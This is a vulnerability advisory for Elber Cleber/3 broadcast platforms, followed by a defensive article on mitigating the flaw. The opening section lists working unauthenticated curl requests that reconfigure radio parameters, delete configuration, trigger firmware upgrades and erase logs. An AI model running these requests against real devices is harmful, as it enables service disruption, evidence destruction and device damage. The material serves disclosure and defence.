Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Device Config Disclosure

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Shell Published Date: 2024-05-04

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.0.0 Revision 7304
                  1.0.0 Revision 7284
                  1.0.0 Revision 6505
                  1.0.0 Revision 6332
                  1.0.0 Revision 6258
                  XS2DAB v1.50 rev 6267

Summary: Cleber offers a powerful, flexible and modular hardware and
software platform for broadcasting and contribution networks where
customers can install up to six boards with no limitations in terms
of position or number. Based on a Linux embedded OS, it detects the
presence of the boards and shows the related control interface to the
user, either through web GUI and Touchscreen TFT display. Power supply
can be single (AC and/or DC) or dual (hot swappable for redundancy);
customer may chose between two ranges for DC sources, that is 22-65
or 10-36 Vdc for site or DSNG applications.

Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5817
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5817.php


18.08.2023

--


# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month

# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully

# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()

# Etc.

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 — Device Configuration Disclosure (ZSL-2024-5817)

This article examines a device configuration disclosure affecting the Elber Cleber/3 Broadcast Multi-Purpose Platform (firmware 1.0.0, multiple revisions). The issue allows unauthenticated access to device configuration endpoints and surfaces client-side hidden functionality, enabling remote actors to read and modify configuration, erase logs, trigger firmware actions and more. Below you will find a concise technical summary, risk and impact analysis, detection strategies, and actionable mitigation and hardening guidance for administrators and integrators.

Key facts and affected products

Vendor	Product	Affected version(s)	Advisory
Elber S.r.l.	Cleber/3 Broadcast Multi-Purpose Platform	1.0.0 (Revisions 6258, 6332, 6505, 7284, 7304) and XS2DAB v1.50 rev 6267	ZSL-2024-5817 (zeroscience.mk)

Summary of the vulnerability

The Cleber/3 platform ships a web-based control interface running on an embedded Linux OS. Several JSON endpoints and client-side functions are reachable without authentication, allowing remote actors to view and modify device configuration and to invoke sensitive actions. Client-side code also exposes hidden console/diagnostic functions that can be triggered via the web UI.

Why this matters — potential impacts

Unauthorized reconfiguration of broadcast receive/transmit parameters (frequency, gains, routing), risking service disruption or regulatory violations.
Deletion of stored configuration files or logs, undermining forensic evidence and operational resilience.
Triggering of firmware upgrade flows or factory/diagnostic routines remotely, which can brick devices or establish persistence if malicious firmware is introduced.
Exposure of client-side hidden functionality that can be combined with other weaknesses to achieve greater control over the device.
Operational impact for mission-critical broadcast infrastructure (transmitters, DSNG, remote sites) leading to service outage, signal loss or reputational/regulatory consequences.

Technical overview (high level)

Vulnerable endpoints accept HTTP GET requests with query parameters that map directly to internal configuration operations. Because the endpoints do not require prior authentication, any party with network reachability to the device's web interface can invoke configuration changes. The client-side UI also contains exposed console functions that call underlying JSON endpoints, revealing toggles and management operations intended to be protected in other deployments.

Detection and assessment (non-destructive)

Network defenders should determine whether Cleber/3 devices exist on their networks and whether those devices are reachable from untrusted networks (internet, guest VLANs). Focus on inventory and segmentation validation rather than running invasive commands.

Inventory: use existing asset management or network scans to find devices by manufacturer strings, MAC OUI, or HTTP title/headers.
Reachability: confirm management ports (HTTP/HTTPS) are only accessible from authorized management VLANs or jump hosts.
Log review: check web server access logs for unauthorised POST/GET requests from unusual IPs and for evidence of suspicious configuration operations.

Recommended immediate mitigations (administrative and network)

Apply the following steps immediately to reduce exposure while a vendor patch or firmware update is obtained and validated.

Isolate devices: restrict access to Cleber/3 interfaces to a dedicated management network. Do not expose management ports directly to the internet.
Firewall rules: drop or restrict inbound HTTP/HTTPS access except from authorized admin IPs.
Monitoring and logging: increase retention of web server and system logs; set alerts for configuration changes and log deletions.
Vendor communication: contact Elber support to obtain the latest firmware and recommended remediation steps. Request timelines and a patch if not yet available.

Example: restrictive firewall rules (iptables)

# Allow only the management subnet (192.168.100.0/24) to access device web UI (port 80 and 443)
iptables -A INPUT -p tcp -s 192.168.100.0/24 --dport 80 -j ACCEPT
iptables -A INPUT -p tcp -s 192.168.100.0/24 --dport 443 -j ACCEPT

# Block all other access to web ports
iptables -A INPUT -p tcp --dport 80 -j REJECT
iptables -A INPUT -p tcp --dport 443 -j REJECT

Explanation: The example above demonstrates a simple host-based firewall approach that permits only a specific management subnet to reach the device's HTTP/HTTPS ports while rejecting other incoming connections. Replace the CIDR range with your validated management network and ensure rules are applied persistently on your device or perimeter firewall.

Example: Nginx reverse-proxy with basic authentication (defensive)

server {
    listen 443 ssl;
    server_name cleber-mgmt.example.local;

    ssl_certificate /etc/ssl/certs/management.crt;
    ssl_certificate_key /etc/ssl/private/management.key;

    location / {
        auth_basic "Management Area";
        auth_basic_user_file /etc/nginx/htpasswd;
        proxy_pass http://cleber-device.local:80;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

Explanation: Fronting the device with an authenticated reverse proxy adds an authentication layer and centralizes TLS termination and access logging. The proxy can also implement IP allowlists, rate limiting and request inspection to reduce risk from unauthenticated endpoints on the device itself.

Longer-term fixes and secure design recommendations

Vendor patching: push for an official firmware update that enforces authentication and authorization checks on management endpoints and removes or gates client-side hidden management functions.
Input validation and output encoding: ensure server-side input validation prevents unexpected parameter values, and validate any upgrade/erase flows to require cryptographic verification.
Secure firmware update: require signed, encrypted firmware images and fail-safe update mechanisms (A/B partitions, rollback support) to prevent bricking or malicious firmware installation.
Least privilege and role-based access control (RBAC): implement fine-grained management roles and session controls to limit the scope of any compromised account.
Secure default configuration: ship devices with management interfaces bound to management-only networks and secure defaults for authentication and logging.

For administrators: incident response checklist

Isolate affected devices from production networks and restrict all management access to an administrator-only VLAN or out-of-band management path.
Preserve logs and configuration backups before making changes, and capture volatile state if needed for investigation.
Check for evidence of unauthorized configuration changes, recent firmware upgrade attempts, or log deletions.
Apply vendor-supplied firmware or mitigations once validated, and then bring systems back into production following controlled tests.

Responsible disclosure and coordination

If you discover affected devices in your environment, contact Elber S.r.l. through their official support channels and provide your findings. Coordinate remediation windows with operational teams to avoid broadcast service disruption. If uncertainty remains about a public firmware fix or timeline, consider engaging a qualified integrator or security vendor to help harden the deployment.

Conclusion

The Cleber/3 device configuration disclosure is a high-risk issue for operators of broadcast infrastructure because it allows unauthenticated control over critical functions. Immediate network-level mitigations (segmentation, firewalling, authenticated proxying) combined with vendor-patched firmware and long-term secure development practices are required to fully remediate the risk.